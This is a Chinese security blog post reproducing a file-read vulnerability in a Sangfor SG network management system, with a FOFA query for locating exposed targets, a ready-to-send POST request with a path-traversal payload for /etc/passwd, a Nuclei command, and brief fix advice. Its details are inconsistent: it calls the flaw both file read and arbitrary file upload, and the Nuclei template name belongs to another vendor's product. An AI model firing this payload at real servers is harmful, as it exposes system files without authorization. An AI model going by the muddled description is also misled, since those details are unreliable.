漏洞复现|深信服SG上网优化管理系统存在文件读取漏洞

漏洞复现|深信服SG上网优化管理系统存在文件读取漏洞

原创 禾小盾 数字人才创研院 2023-10-12 15:51

点击上方
蓝字关注我们

BEGINNING OF SPRING

0x01

阅读须知       

Reading Instructions

数字人才创研院秉承探究学习与交流的理念,一切从降低已有潜在威胁出发,所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。

郑重声明:本文所提供的工具与思路仅用于学习与研究,禁止用于非法目的!

团队已致电说明并告知详细解决方案!

0x02

漏洞概述      

Vulnerability Overview

深信服科技股份有限公司是一家专注于企业级网络安全、云计算、IT基础设施与物联网的产品和服务供应商,拥有深信服智安全、信服云两大业务品牌,与子公司信锐技术,致力于承载各行业用户数字化转型过程中的基石性工作,从而让每个用户的数字化更简单、更安全。

深信服SG上网优化管理系统 catjs.php
存在任意文件上传漏洞
未经授权的攻击者通过漏洞可以上传任意文件,获取服务器权
限。

(文章仅限技术交流,禁止非授权操作!)

0x03

漏洞复现      

Vulnerability Recurrence

fofa:title=”SANGFOR上网优化管理”

1.执行如下语句上传txt文档,并访问该txt文件。


POST /php/catjs.php HTTP/1.1
Host: {Hostname}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 35
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
["../../../../../../../etc/passwd"]

其中Hostname为目标漏洞平台的实际地址或域名

2.访问
目标漏洞资产
,得到内容“敏感信息”

(文章仅限技术交流,禁止非授权操作!)

0x04

漏洞脚本     

Vulnerability script

1.Nuclei验证脚本命令使用如下:

nuclei.exe -t wangshen-secgate-objappupfile-fileupload.yaml -l wangshen-secgate-objappupfile-fileupload_Subs.txt
--------------------------------------------
wangshen-secgate-objappupfile-fileupload_Subs.txt可以结合实际情况自定义
--------------------------------------------

2.空间指纹截图如下:

3.关注公众号并回复:
深信服SG
,即可获取脚本

(文章仅限技术交流,禁止非授权操作!)

0x05

修复建议     

Repair Suggestions

1.实施产品的权限访问控制,降低互联网搜索引擎的查询。

2.加强后台认证要求(如AAAA策略等),提高口令的安全性。

3.增强关键页面的安全性,提升WEB后台的安全访问控制权限能力。

往期推荐 · 值得阅看

点亮「星标」,让我们不再错过~2023-10-11

漏洞复现|网神SecGate3600防火墙存在任意文件上传漏洞2023-09-28

漏洞复现|某友集团报表系统存在未授权访问+任意文件上传利用漏洞2023-09-20

漏洞复现|某VPN存在未授权管理用户遍历+任意账号密码修改漏洞2023-08-15

PHPMyadmin的Getshell方法汇总2023-07-01

漏洞复现|北京网康 NS-ASG安全网关存在远程命令执行漏洞2023-06-19

漏洞复现|联软科技安全准入门户平台存在远程代码执行漏洞

2023-06-02

END